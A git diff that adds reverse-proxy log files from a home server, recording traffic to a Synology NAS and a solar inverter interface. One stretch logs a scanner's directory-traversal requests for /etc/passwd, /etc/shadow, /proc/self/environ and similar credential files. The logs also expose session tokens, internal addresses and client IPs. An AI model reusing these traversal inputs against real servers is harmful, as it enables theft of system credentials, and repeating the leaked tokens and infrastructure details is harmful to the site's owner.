/scripts/sencha-touch-2.4.1/touch.js?v=42962 HTTP/2.0", upstream: "https://192.168.100.30:5001/scripts/sencha-touch-2.4.1/touch.js?v=42962", host: "nas.profibot.hu" +2026/01/15 13:51:05 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/97/0000060973 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /webman/3rdparty/SynologyDrive-Drive/style.css?v=1731304858 HTTP/2.0", upstream: "https://192.168.100.30:5001/webman/3rdparty/SynologyDrive-Drive/style.css?v=1731304858", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:05 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/97/0000060974 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /webman/3rdparty/VideoStation/style.css?v=1711016943 HTTP/2.0", upstream: "https://192.168.100.30:5001/webman/3rdparty/VideoStation/style.css?v=1711016943", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:05 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/97/0000060975 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /webman/3rdparty/SynologyPhotos/style.css?v=1733908506 HTTP/2.0", upstream: "https://192.168.100.30:5001/webman/3rdparty/SynologyPhotos/style.css?v=1733908506", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:05 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/97/0000060976 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /scripts/ext-3/ext-all.js?v=1650348555 HTTP/2.0", upstream: "https://192.168.100.30:5001/scripts/ext-3/ext-all.js?v=1650348555", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:05 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/97/0000060977 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /scripts/ext-3/ux/ux-all.js?v=1650348555 HTTP/2.0", upstream: "https://192.168.100.30:5001/scripts/ext-3/ux/ux-all.js?v=1650348555", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:05 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/97/0000060978 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /scripts/babel-polyfill/polyfill.js?v=1650348555 HTTP/2.0", upstream: "https://192.168.100.30:5001/scripts/babel-polyfill/polyfill.js?v=1650348555", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:05 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/97/0000060979 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /scripts/noise/sodium.js?v=1650348555 HTTP/2.0", upstream: "https://192.168.100.30:5001/scripts/noise/sodium.js?v=1650348555", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:05 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/98/0000060980 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476 HTTP/2.0", upstream: "https://192.168.100.30:5001/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:05 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/98/0000060981 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /synoSDSjslib/sds.js?v=1678269761 HTTP/2.0", upstream: "https://192.168.100.30:5001/synoSDSjslib/sds.js?v=1678269761", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:05 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/98/0000060982 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725 HTTP/2.0", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:09 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/98/0000060983 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /webman/login_background.jpg?id=1 HTTP/2.0", upstream: "https://192.168.100.30:5001/webman/login_background.jpg?id=1", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:21 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/98/0000060984 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /webman/resources/images/2x/default_wallpaper/dsm7_01.jpg?v=42962 HTTP/2.0", upstream: "https://192.168.100.30:5001/webman/resources/images/2x/default_wallpaper/dsm7_01.jpg?v=42962", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:22 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/98/0000060985 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /webapi/entry.cgi?api=SYNO.Core.PersonalSettings&method=wallpaper&version=1&path=%22%22&retina=true&id=1&SynoToken=MbvSA7Zte.JE6 HTTP/2.0", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?api=SYNO.Core.PersonalSettings&method=wallpaper&version=1&path=%22%22&retina=true&id=1&SynoToken=MbvSA7Zte.JE6", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:24 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/98/0000060986 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "POST /webapi/entry.cgi HTTP/2.0", upstream: "https://192.168.100.30:5001/webapi/entry.cgi", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:51:24 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/98/0000060987 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "POST /webapi/entry.cgi HTTP/2.0", upstream: "https://192.168.100.30:5001/webapi/entry.cgi", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:53:36 [warn] 315#315: *126891 a client request body is buffered to a temporary file /tmp/nginx/body/8/98/0000060988, client: 84.1.26.27, server: nas.profibot.hu, request: "POST /webapi/entry.cgi HTTP/2.0", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/15 13:53:40 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/98/0000060989 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /scripts/syno-vue-components/syno-vue-components.min.js?v=42962-s9 HTTP/2.0", upstream: "https://192.168.100.30:5001/scripts/syno-vue-components/syno-vue-components.min.js?v=42962-s9", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +2026/01/15 13:53:40 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/99/0000060990 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /scripts/noise/sodium.js?v=42962-s9 HTTP/2.0", upstream: "https://192.168.100.30:5001/scripts/noise/sodium.js?v=42962-s9", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +2026/01/15 13:53:40 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/99/0000060991 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /scripts/ext-3/ext-all.js?v=42962-s9 HTTP/2.0", upstream: "https://192.168.100.30:5001/scripts/ext-3/ext-all.js?v=42962-s9", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +2026/01/15 13:53:40 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/99/0000060992 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=42962-s9 HTTP/2.0", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=42962-s9", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +2026/01/15 13:53:43 [warn] 315#315: *126891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/99/0000060993 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /webapi/entry.cgi?lang=%22hun%22&debug=null&launch_app=%22SYNO.SDS.VideoStation.AppInstance%22&api=SYNO.Core.Desktop.Initdata&method=get_ui_config&version=1&SynoToken=MbvSA7Zte.JE6 HTTP/2.0", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?lang=%22hun%22&debug=null&launch_app=%22SYNO.SDS.VideoStation.AppInstance%22&api=SYNO.Core.Desktop.Initdata&method=get_ui_config&version=1&SynoToken=MbvSA7Zte.JE6", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +2026/01/20 17:21:27 [warn] 208#208: *110 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000000001 while reading upstream, client: 216.81.245.209, server: nas.profibot.hu, request: "GET /scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476 HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476", host: "nas.profibot.hu" +2026/01/20 17:21:28 [warn] 208#208: *60 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000000002 while reading upstream, client: 216.81.245.209, server: nas.profibot.hu, request: "GET /webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725 HTTP/1.1", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725", host: "nas.profibot.hu" +2026/01/20 17:21:28 [warn] 209#209: *109 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000000003 while reading upstream, client: 216.81.245.209, server: nas.profibot.hu, request: "GET /scripts/ext-3/ext-all.js?v=1650348555 HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/ext-3/ext-all.js?v=1650348555", host: "nas.profibot.hu" +2026/01/20 17:21:29 [warn] 208#208: *110 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000000004 while reading upstream, client: 216.81.245.209, server: nas.profibot.hu, request: "GET /scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476.map HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476.map", host: "nas.profibot.hu" +2026/01/20 17:21:30 [warn] 210#210: *93 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000000005 while reading upstream, client: 216.81.245.209, server: nas.profibot.hu, request: "GET /scripts/noise/sodium.js?v=1650348555 HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/noise/sodium.js?v=1650348555", host: "nas.profibot.hu" +2026/01/20 17:21:30 [warn] 209#209: *109 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000000006 while reading upstream, client: 216.81.245.209, server: nas.profibot.hu, request: "GET /scripts/ext-3/ext-all.js?v=1650348555.map HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/ext-3/ext-all.js?v=1650348555.map", host: "nas.profibot.hu" +2026/01/20 17:21:32 [warn] 210#210: *93 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/00/0000000007 while reading upstream, client: 216.81.245.209, server: nas.profibot.hu, request: "GET /scripts/noise/sodium.js?v=1650348555.map HTTP/1.1", upstream: "https://192.168.100.30:5001/scripts/noise/sodium.js?v=1650348555.map", host: "nas.profibot.hu" +2026/01/20 17:21:33 [warn] 208#208: *60 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/00/0000000008 while reading upstream, client: 216.81.245.209, server: nas.profibot.hu, request: "GET /webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725.map HTTP/1.1", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725.map", host: "nas.profibot.hu" +2026/01/21 01:24:08 [warn] 259#259: *10304 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2f..%2f..%2f..%2froot/.bash_history HTTP/1.1" +2026/01/21 01:24:28 [warn] 259#259: *10493 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/hosts HTTP/1.1" +2026/01/21 01:24:36 [warn] 259#259: *10940 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2f..%2f..%2f..%2fproc/self/environ HTTP/1.1" +2026/01/21 01:24:59 [warn] 259#259: *11094 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/shadow HTTP/1.1" +2026/01/21 01:25:02 [warn] 257#257: *11530 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/config/SAM HTTP/1.1" +2026/01/21 01:25:16 [warn] 257#257: *11596 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/php.ini HTTP/1.1" +2026/01/21 01:25:25 [warn] 257#257: *11851 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1" +2026/01/21 01:25:44 [warn] 257#257: *12026 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/hostname HTTP/1.1" +2026/01/21 01:25:44 [warn] 257#257: *12381 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2f..%2f..%2f..%2fvar/log/apache2/access.log HTTP/1.1" +2026/01/21 01:25:45 [warn] 257#257: *12382 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2f..%2f..%2f..%2fvar/log/nginx/access.log HTTP/1.1" +2026/01/21 01:25:52 [warn] 257#257: *12392 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" +2026/01/21 01:25:54 [warn] 257#257: *12518 using uninitialized "server" variable while logging request, client: 185.177.72.49, server: nas.profibot.hu, request: "GET /..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" +2026/01/21 07:34:36 [warn] 265#265: *14645 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/47/0000004475 while reading upstream, client: 204.76.203.25, server: nas.profibot.hu, request: "GET /webman/taskbar/dist/dsm.taskbar.bundle.js HTTP/1.1", upstream: "https://192.168.100.30:5001/webman/taskbar/dist/dsm.taskbar.bundle.js", host: "nas.profibot.hu" +2026/01/22 05:01:28 [warn] 292#292: *23706 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/19/0000008196 while reading upstream, client: 84.254.106.197, server: nas.profibot.hu, request: "GET /scripts/sencha-touch-2.4.1/touch.js?v=42962 HTTP/2.0", upstream: "https://192.168.100.30:5001/scripts/sencha-touch-2.4.1/touch.js?v=42962", host: "nas.profibot.hu" +2026/01/22 12:50:53 [warn] 301#301: *29147 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/42/0000010427 while reading upstream, client: 84.1.26.27, server: nas.profibot.hu, request: "GET /webapi/entry.cgi?lang=%22hun%22&debug=null&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_ui_config&version=1&SynoToken=f2zDo5IEsPcHw HTTP/2.0", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?lang=%22hun%22&debug=null&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_ui_config&version=1&SynoToken=f2zDo5IEsPcHw", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/28 23:33:48 [warn] 331#331: *33166 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/24/0000014240 while reading upstream, client: 37.76.10.148, server: nas.profibot.hu, request: "GET /webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=42962 HTTP/2.0", upstream: "https://192.168.100.30:5001/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=42962", host: "nas.profibot.hu", referrer: "https://nas.profibot.hu/" +2026/01/31 18:45:43 [warn] 262#262: *4375 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/76/0000000764 while reading upstream, client: 204.76.203.25, server: nas.profibot.hu, request: "GET /webman/taskbar/dist/dsm.taskbar.bundle.js HTTP/1.1", upstream: "https://192.168.100.30:5001/webman/taskbar/dist/dsm.taskbar.bundle.js", host: "nas.profibot.hu" diff --git a/proxy-manager/data/logs/proxy-host-6_error.log.1.gz b/proxy-manager/data/logs/proxy-host-6_error.log.1.gz new file mode 100755 index 0000000..c69f7a5 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-6_error.log.1.gz differ diff --git a/proxy-manager/data/logs/proxy-host-6_error.log.2.gz b/proxy-manager/data/logs/proxy-host-6_error.log.2.gz new file mode 100755 index 0000000..c1d2931 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-6_error.log.2.gz differ diff --git a/proxy-manager/data/logs/proxy-host-6_error.log.3.gz b/proxy-manager/data/logs/proxy-host-6_error.log.3.gz new file mode 100755 index 0000000..6cd3e1d Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-6_error.log.3.gz differ diff --git a/proxy-manager/data/logs/proxy-host-7_access.log b/proxy-manager/data/logs/proxy-host-7_access.log new file mode 100755 index 0000000..f0205d7 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-7_access.log @@ -0,0 +1,760 @@ +[12/Jan/2026:17:56:48 +0000] - 200 200 - GET http fimer.profibot.hu "/" [Client 37.76.12.170] [Length 1663] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[12/Jan/2026:17:56:48 +0000] - 200 200 - GET http fimer.profibot.hu "/splash-screen.css?version=1729759760754" [Client 37.76.12.170] [Length 595] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:48 +0000] - 200 200 - GET http fimer.profibot.hu "/index.css?version=1729759760754" [Client 37.76.12.170] [Length 46644] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:48 +0000] - 200 200 - GET http fimer.profibot.hu "/splash-screen.css?5470dfb553c45ab13d14" [Client 37.76.12.170] [Length 595] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:48 +0000] - 200 200 - GET http fimer.profibot.hu "/splash-screen.es6.js?5470dfb553c45ab13d14" [Client 37.76.12.170] [Length 487] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:48 +0000] - 200 200 - GET http fimer.profibot.hu "/index.css?5470dfb553c45ab13d14" [Client 37.76.12.170] [Length 46644] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:48 +0000] - 200 200 - GET http fimer.profibot.hu "/index.es6.js?5470dfb553c45ab13d14" [Client 37.76.12.170] [Length 491776] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:48 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Fimer-Grotesk-Bold.woff2" [Client 37.76.12.170] [Length 35332] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[12/Jan/2026:17:56:48 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Fimer-Grotesk-Regular.woff2" [Client 37.76.12.170] [Length 34828] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[12/Jan/2026:17:56:48 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Muli-Regular.ttf" [Client 37.76.12.170] [Length 42239] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Muli-Bold.ttf" [Client 37.76.12.170] [Length 42386] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Muli-Medium.ttf" [Client 37.76.12.170] [Length 42417] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/fa-solid-900.woff2" [Client 37.76.12.170] [Length 78268] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.12.170] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:49 +0000] - 404 404 - GET http fimer.profibot.hu "/favicon.ico" [Client 37.76.12.170] [Length 181] [Gzip 3.22] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.12.170] [Length 104709] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/assets/fimer-solar-2.jpg" [Client 37.76.12.170] [Length 66542] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.12.170] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.12.170] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.12.170] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.12.170] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:49 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.12.170] [Length 1678] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.12.170] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product/commissioned" [Client 37.76.12.170] [Length 4] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:49 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.12.170] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.12.170] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/config" [Client 37.76.12.170] [Length 184] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.12.170] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) 